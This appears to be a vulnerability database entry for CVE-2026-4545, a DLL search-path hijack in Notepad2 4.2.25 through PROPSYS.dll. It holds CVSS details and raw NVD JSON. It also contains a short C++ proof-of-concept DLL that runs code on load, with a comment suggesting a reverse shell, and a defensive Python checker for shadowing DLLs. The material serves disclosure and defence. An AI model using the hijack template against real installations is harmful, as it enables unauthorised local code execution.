Security Vulnerability Report
CVE-2026-4545 CVSS 7.0 HIGH

CVE-2026-4545

Published: 2026-03-22 12:16:04
Last Modified: 2026-04-30 14:25:09

Description

A security flaw has been discovered in Flos Freeware Notepad2 4.2.25. This affects an unknown function in the library PROPSYS.dll. Performing a manipulation results in uncontrolled search path. The attack is only possible with local access. The attack is considered to have high complexity. The exploitability is reported as difficult. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
7.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:flos-freeware:notepad2:4.2.25:*:*:*:*:*:*:* - VULNERABLE
Flos Freeware Notepad2 4.2.25

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
cpp
/**
 * PoC for CVE-2026-4545 - Uncontrolled Search Path in Notepad2
 * This code demonstrates how to create a malicious PROPSYS.dll
 * to be loaded by Notepad2 when placed in the same directory.
 *
 * Compilation (Visual Studio Developer Command Prompt):
 * cl /LD malicious_propsys.cpp user32.lib
 */
#include <windows.h>

// Entry point for the DLL
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // This code runs when the DLL is loaded into the process
        MessageBoxA(NULL, "CVE-2026-4545 PoC: Malicious PROPSYS.dll loaded successfully!", "Exploit", MB_OK | MB_ICONINFORMATION);
        // Example: Start a calculator or reverse shell
        // WinExec("calc.exe", SW_SHOW);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// Export dummy functions to match expected DLL structure if necessary
extern "C" __declspec(dllexport) void DummyFunction() {}
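A defender-side check for the condition the PoC comment describes, a PROPSYS.dll sitting in the same directory as Notepad2. This is an added example, not part of the original entry or of Notepad2; the function names, the directory layout and `helper.dll` are constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path


def system_dll_names(system_dir):
    """Lower-cased names of every .dll found in the system directory."""
    return {p.name.lower() for p in Path(system_dir).iterdir()
            if p.is_file() and p.suffix.lower() == ".dll"}


def find_shadowing_dlls(app_dir, system_dir):
    """Report DLLs in app_dir whose name also exists in system_dir.

    Windows file names are case-insensitive, so names are compared
    lower-cased. A hit is a copy next to the executable that shares its
    name with a system library and should be reviewed (origin, signature).
    """
    known = system_dll_names(system_dir)
    hits = []
    for p in sorted(Path(app_dir).iterdir()):
        if p.is_file() and p.suffix.lower() == ".dll" and p.name.lower() in known:
            digest = hashlib.sha256(p.read_bytes()).hexdigest()
            hits.append({"name": p.name, "path": str(p), "sha256": digest})
    return hits


def demo():
    """Run the check on a constructed layout (not a real installation)."""
    with tempfile.TemporaryDirectory() as root:
        system32 = Path(root, "System32")
        app = Path(root, "Notepad2")
        system32.mkdir()
        app.mkdir()
        for name in ("propsys.dll", "kernel32.dll"):
            (system32 / name).write_bytes(b"system copy")
        (app / "Notepad2.exe").write_bytes(b"app")
        (app / "helper.dll").write_bytes(b"app-private library")  # constructed name
        (app / "PROPSYS.dll").write_bytes(b"unexpected copy")
        return [h["name"] for h in find_shadowing_dlls(app, system32)]


if __name__ == "__main__":
    # On a real host, pass the Notepad2 install directory and
    # %SystemRoot%\System32 instead of the constructed folders.
    print(demo())
```

The returned SHA-256 lets the flagged file be compared against the system copy or looked up in an allow-list before it is removed.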

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4545", "sourceIdentifier": "[email protected]", "published": "2026-03-22T12:16:03.963", "lastModified": "2026-04-30T14:25:09.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Flos Freeware Notepad2 4.2.25. This affects an unknown function in the library PROPSYS.dll. Performing a manipulation results in uncontrolled search path. The attack is only possible with local access. The attack is considered to have high complexity. The exploitability is reported as difficult. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha descubierto una falla de seguridad en Flos Freeware Notepad2 4.2.25. Afecta a una función desconocida en la biblioteca PROPSYS.dll. Realizar una manipulación resulta en una ruta de búsqueda incontrolada. El ataque solo es posible con acceso local. El ataque se considera de alta complejidad. La explotabilidad se reporta como difícil. 
El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", 
"confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:S/C:C/I:C/A:C", "baseScore": 6.0, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 1.5, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-426"}, {"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flos-freeware:notepad2:4.2.25:*:*:*:*:*:*:*", "matchCriteriaId": "7F9353EF-AE2A-46D0-A3D9-0368BD060444"}]}]}], "references": [{"url": "https://drive.google.com/file/d/1o3A3x47B2gi645H02-28qgoIgGN-g6rK/view", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://vuldb.com/?ctiid.352372", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://vuldb.com/?id.352372", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.774752", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}